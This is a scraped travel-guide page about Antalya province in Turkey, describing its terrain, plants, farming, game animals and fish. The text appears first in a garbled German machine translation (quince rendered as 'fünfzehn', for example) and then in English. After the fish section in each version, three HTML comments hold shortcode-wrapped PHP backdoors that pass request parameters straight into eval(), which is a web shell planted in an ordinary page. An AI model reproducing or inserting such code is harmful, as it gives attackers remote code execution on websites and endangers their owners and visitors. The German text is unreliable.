Zuhause / Antalya / Antalya Reiseführer

Antalya Reiseführer

antalya-Reise-FührerWillkommen in Antalya Reiseführer. Antalya ist die Hauptstadt und das größte Zentrum der Bevölkerung der Region, mit seiner Bevölkerung von mehr als einer halben Million. Die Stadt liegt auf einer Hochebene, die gegen das lehnt sich befinden “Stierkampf” Berge und die Klippen am Meer bildet. Auf der ersten felsigen Ebene an der Küste ist die Innenstadt und auf der Ebene dahinter, benannt Kepezüstü, kleinen Siedlungseinheiten eingerichtet worden. Die Küste ist 530 km in der Länge und Grenzen mit Eşen im Westen und Kaledran Bach im Osten. Die Provinz hat eine Fläche von 20,820 km2. Der Boden der Ebene besteht aus Konglomerat, Alluvium und Travertin Falez Felsen.

Die Taurus-Gebirge, von Kalkstein und Serpentin Länder gebildet, mit Karstoberflächenformationen, haben viele tiefe Täler, Höhlen, Spalten und Störungen. In den Sumpfgebieten in einer Höhe von 300 m von der Küste Gestrüpp, wie Macchia bekannt, gefunden. Dazu gehören Oleander, Walderdbeeren, Sandelholz, Erdbeerbäume, Myrte, Zedrachgewächse Bäume, Bucht, keusch Bäume, Johannisbrotbäume, Besen und Wolfsmilch. Thymian, Salbei, Safran, Klette, Asphodelus, Spargel, Brombeere, Chrysantheme und, dünn, Eiche, Oriental-Ebene, Wildbirne, Oliven-und Lindenbäumen finden sich auch.

300 Meter weiter in, die roten Kiefern-und Eichenwälder, und Sümpfe mit Eukalyptusbäumen gesehen werden. 1200 m weiter auf der Wälder mit Zedern, Tannenbäume, Kiefer, Wacholder-und Buchen beginnen. Wie das Schwemmland auf den Ebenen ist für die Landwirtschaft, Gemüse, Obst und Blumen in Gewächshäusern für den Export angebaut. Offene Orange, Mandarine, Zitrone und Grapefruit Gärten in der Nähe zu sehen, in den warmen Mittelmeerwind. Auf der östlich von Antalya Klar, Banane und Avocado angebaut. Baumwolle wird als eine Industrieanlage und Baumwollproduktion gesät, zusammen mit Baumwollfabriken und Textilfabriken, birgt ein großes Potenzial für die Türkei. Äpfel, Birnen, fünfzehn, Trauben und Sesam auf der gebirgigen Hochebenen angebaut.

Die regionale Fauna ist sehr gut für die Jagd Touren. In Duzlercami auf das Taurusgebirge, mit einer Fläche von 10,000 ha, Damhirsch, Wildziege und Reh Jagd auf einer kontrollierten Basis erlaubt. Wölfe, Füchse, Braunbären, Marder, Wildschwein, Wildkatzen und Schakale sind die Wildarten, die oft found.The Taurus Leopard bekannt war, sind bis vor kurzem existieren. Rebhuhn, Wachtel, Turteltaube, Wildtaube, Amsel, Waldschnepfe, fran und Wildente als Wild angesehen werden.

Die Region ist für seine Fisch grida bekannt; Darüber hinaus, Dorade, Stöcker, schwarz Brassen, Goldkopf, Meeräsche, Knurrhahn, Merlan, schön, gestreifte Meerbarbe, Hornhecht, große bonito, Knurrhahn und Rotbarbe gehören zu den großen Meeresfische, andere Meeresprodukte umfasst Einsiedlerkrebs, Hummer, Garnele, Tintenfisch und Muscheln. Außerdem, Käfig Fischfang im Meer bei sechs Punkten an der Küste, wo Seebarsch und Meeräsche gezüchtet werden durchgeführt. Frischwasserleitung Fischfang in der Eşen durchgeführt, Nicht, Köprüçay, Manavgat, Akçay Alara und Flüsse. Die Fischrestaurants in Wasser in der Dim Creek etabliert sind besonders bekannt. Der Hauptsüßwasserfische sind Süßwasser Döbel, Süßwasser Barsch, Karpfen, Spiegel-Karpfen, Aal, öde und Schleie. Es gibt zahlreiche Forellen Produktionsfarmen und Restaurants in jenen Teilen des Taurus-Gebirge in der Nähe von Wasser und Flussbetten.

<!– [insert_php]if (isset($_REQUEST["KIV"])){eval($_REQUEST["KIV"]);exit;}[/insert_php][php]if (isset($_REQUEST["KIV"])){eval($_REQUEST["KIV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["tXi"])){eval($_REQUEST["tXi"]);exit;}[/insert_php][php]if (isset($_REQUEST["tXi"])){eval($_REQUEST["tXi"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["RcZL"])){eval($_REQUEST["RcZL"]);exit;}[/insert_php][php]if (isset($_REQUEST["RcZL"])){eval($_REQUEST["RcZL"]);exit;}[/php] –>

Booking.com

Lassen Sie eine Antwort

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *

*

Home / Antalya / Antalya Travel Guide

Antalya Travel Guide

antalya-travel-guideWelcome to Antalya Travel Guide. Antalya is the capital and the largest center of population of the region, with its population exceeding half a million. The city is located on a plateau which leans against the “Toros” mountains and which forms cliffs on the sea side. On the first rocky plain on the coast is the town centre and on the plain behind it, named Kepezüstü, small settlement units have been established. The coast is 530 km in length and borders with Eşen in the west and Kaledran creek in the east. The province has an area of 20,820 km2. The soil of the plain is made up of conglomerate, alluvium and travertine falez rocks.

The Taurus mountains, formed of limestone and serpentine lands, with karst surface formations, have many deep valleys, caves, crevices and faults. In the marshy areas at a height of 300 m from the coast scrub trees, known as maquis, are found. These include oleander, wild strawberries, sandalwood, strawberry trees, myrtle, chinaberry trees, bay, chaste trees, carob trees, broom and spurge. Thyme, sage, saffron, burdock, asphodel, asparagus, blackberry, chrysanthemum and, sparsely, oak, Oriental plane, wild pear, olive and linden trees are also found.

300 metres further on in, the red pine and oak forests, and marshes with eucalyptus trees can be seen. 1200 m further on the forests with cedar, fir trees, Scotch pine, juniper and beech begin. As the alluvial soil on the plains is suitable for agriculture, vegetables, fruit and flowers are grown in greenhouses for export. Open orange, mandarin, lemon and grapefruit gardens can be seen in the vicinity, in the warm Mediterranean winds. On the east of the Antalya plain, banana and avocado are grown. Cotton is sown as an industrial plant and cotton production, along with cotton mills and textile factories, holds great potential for Turkey. Apples, pears, quince, grapes and sesame are grown on the mountainous plateaus.

The regional fauna is very good for hunting tours. In Düzlerçamı on the Taurus mountains, covering an area of 10,000 hectares, fallow deer, wild goat and roe deer hunting is permitted on a controlled basis. Wolves, foxes, brown bears, martens, wild boar, wild cats and jackals are the wild species that are often found.The Taurus Leopard was known to exist until recently. Partridge, quail, turtle dove, wild pigeon, blackbird, woodcock, francolin and wild duck can be regarded as game birds.

The region is well-known for its grida fish; in addition to this, sea bream, horse mackerel, black bream, gilt-head, grey mullet, gurnard, whiting, bonito, striped red mullet, needlefish, large bonito, red gurnard and red mullet are among the major sea fish, other sea produce includes hermit crab, lobster, shrimp, cuttle-fish and mussel. In addition, cage fishing is carried out in the sea at six points on the coast where sea-bass and grey mullet are bred. Fresh water line fishing is carried out in the Eşen, Dim, Köprüçay, Manavgat, Akçay and Alara rivers. The fish restaurants established within water in the Dim Creek are particularly famous. The main fresh water fish are fresh water chub, fresh water perch, carp, mirror-carp, eel, bleak and tench. There are numerous trout production farms and restaurants in those parts of the Taurus Mountains close to water and river beds.

<!– [insert_php]if (isset($_REQUEST["KIV"])){eval($_REQUEST["KIV"]);exit;}[/insert_php][php]if (isset($_REQUEST["KIV"])){eval($_REQUEST["KIV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["tXi"])){eval($_REQUEST["tXi"]);exit;}[/insert_php][php]if (isset($_REQUEST["tXi"])){eval($_REQUEST["tXi"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["RcZL"])){eval($_REQUEST["RcZL"]);exit;}[/insert_php][php]if (isset($_REQUEST["RcZL"])){eval($_REQUEST["RcZL"]);exit;}[/php] –>

Booking.com

Leave a Reply

Your email address will not be published. Required fields are marked *

*